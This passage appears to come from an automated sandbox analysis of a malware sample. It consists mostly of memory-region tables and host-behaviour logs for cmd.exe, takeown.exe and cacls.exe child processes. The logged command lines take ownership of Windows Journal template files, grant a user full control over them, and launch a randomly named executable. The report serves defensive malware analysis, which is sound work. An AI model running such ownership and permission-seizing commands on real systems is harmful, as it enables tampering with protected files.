- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04ed3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ee0000 | 0x04ee0000 | 0x04ef3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f00000 | 0x04f00000 | 0x04f3ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f40000 | 0x04f40000 | 0x0503ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005040000 | 0x05040000 | 0x05043fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005050000 | 0x05050000 | 0x05050fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005060000 | 0x05060000 | 0x05061fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005070000 | 0x05070000 | 0x0516ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x0519ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x051a0000 | 0x0525dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005260000 | 0x05260000 | 0x0529ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000052a0000 | 0x052a0000 | 0x0539ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000053a0000 | 0x053a0000 | 0x054cffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x054d0000 | 0x05806fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007eaf0000 | 0x7eaf0000 | 0x7ebeffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ebf0000 | 0x7ebf0000 | 0x7ec12fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ec18000 | 0x7ec18000 | 0x7ec1afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec1b000 | 0x7ec1b000 | 0x7ec1dfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec1e000 | 0x7ec1e000 | 0x7ec1efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ec1f000 | 0x7ec1f000 | 0x7ec1ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 104, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xfd0, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #174: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #174 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Journal\Templates\blank.jtp" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:10, Reason: Child Process |
| Unmonitor | End Time: 00:03:13, Reason: Self Terminated |
| Monitor Duration | 00:00:03 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x8d4 |
| Parent PID | 0x464 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
728
0x
F24
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000040000 | 0x00040000 | 0x0005ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x0004ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000050000 | 0x00050000 | 0x00053fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000060000 | 0x00060000 | 0x00061fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00060000 | 0x00064fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000070000 | 0x00070000 | 0x00083fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000090000 | 0x00090000 | 0x000cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0010ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000110000 | 0x00110000 | 0x00113fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000120000 | 0x00120000 | 0x00120fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000130000 | 0x00130000 | 0x00131fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00140000 | 0x001fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00280000 | 0x002a9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x002bffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002c0000 | 0x002c0000 | 0x002fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x005c7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005d0000 | 0x005d0000 | 0x00750fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00760000 | 0x00a96fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007f0c0000 | 0x7f0c0000 | 0x7f1bffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f1c0000 | 0x7f1c0000 | 0x7f1e2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f1e8000 | 0x7f1e8000 | 0x7f1eafff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1eb000 | 0x7f1eb000 | 0x7f1edfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1ee000 | 0x7f1ee000 | 0x7f1eefff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f1ef000 | 0x7f1ef000 | 0x7f1effff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #175: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #175 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "WinMail.exe.mui" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:10, Reason: Child Process |
| Unmonitor | End Time: 00:03:15, Reason: Self Terminated |
| Monitor Duration | 00:00:05 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xee8 |
| Parent PID | 0x85c (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
4F8
0x
424
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000090000 | 0x00090000 | 0x000affff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000090000 | 0x00090000 | 0x0009ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000000a0000 | 0x000a0000 | 0x000a3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000000b0000 | 0x000b0000 | 0x000b3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000000c0000 | 0x000c0000 | 0x000d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000000e0000 | 0x000e0000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x0021ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000220000 | 0x00220000 | 0x00223fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000230000 | 0x00230000 | 0x00230fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x00241fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002d0000 | 0x002d0000 | 0x003cffff | Private Memory | rw |
|
|
|
- |
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x0443ffff | Pagefile Backed Memory | - |
|
|
|
- |
| locale.nls | 0x04440000 | 0x044fdfff | Memory Mapped File | r |
|
|
|
- |
| private_0x00000000045f0000 | 0x045f0000 | 0x045fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004600000 | 0x04600000 | 0x046fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004700000 | 0x04700000 | 0x0486ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x04870000 | 0x04ba6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007e480000 | 0x7e480000 | 0x7e57ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007e580000 | 0x7e580000 | 0x7e5a2fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007e5a5000 | 0x7e5a5000 | 0x7e5a7fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5a8000 | 0x7e5a8000 | 0x7e5a8fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5ab000 | 0x7e5ab000 | 0x7e5abfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007e5ad000 | 0x7e5ad000 | 0x7e5affff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 45, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xed4, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #176: cacls.exe
0
0
| Information | Value |
|---|---|
| ID | #176 |
| File Name | c:\windows\syswow64\cacls.exe |
| Command Line | cacls "C:\Program Files\Windows Journal\Templates\Music.jtp" /E /G CIiHmnxMn6Ps:F /C |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:10, Reason: Child Process |
| Unmonitor | End Time: 00:03:17, Reason: Self Terminated |
| Monitor Duration | 00:00:07 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x3a0 |
| Parent PID | 0xde0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A14
0x
75C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x00000000004d0000 | 0x004d0000 | 0x004effff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000004d0000 | 0x004d0000 | 0x004dffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x00000000004e0000 | 0x004e0000 | 0x004e3fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x004f1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000004f0000 | 0x004f0000 | 0x004f3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000500000 | 0x00500000 | 0x00513fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000520000 | 0x00520000 | 0x0055ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000560000 | 0x00560000 | 0x0059ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000005a0000 | 0x005a0000 | 0x005a3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000005b0000 | 0x005b0000 | 0x005b0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000005c0000 | 0x005c0000 | 0x005c1fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000005d0000 | 0x005d0000 | 0x0060ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000610000 | 0x00610000 | 0x0064ffff | Private Memory | rw |
|
|
|
- |
| cacls.exe.mui | 0x00650000 | 0x00651fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000660000 | 0x00660000 | 0x0066ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000670000 | 0x00670000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00670000 | 0x0072dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000790000 | 0x00790000 | 0x0088ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000890000 | 0x00890000 | 0x00a0ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x00a10000 | 0x00d46fff | Memory Mapped File | r |
|
|
|
- |
| cacls.exe | 0x01040000 | 0x01049fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001050000 | 0x01050000 | 0x0504ffff | Pagefile Backed Memory | - |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x742c0000 | 0x742e7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
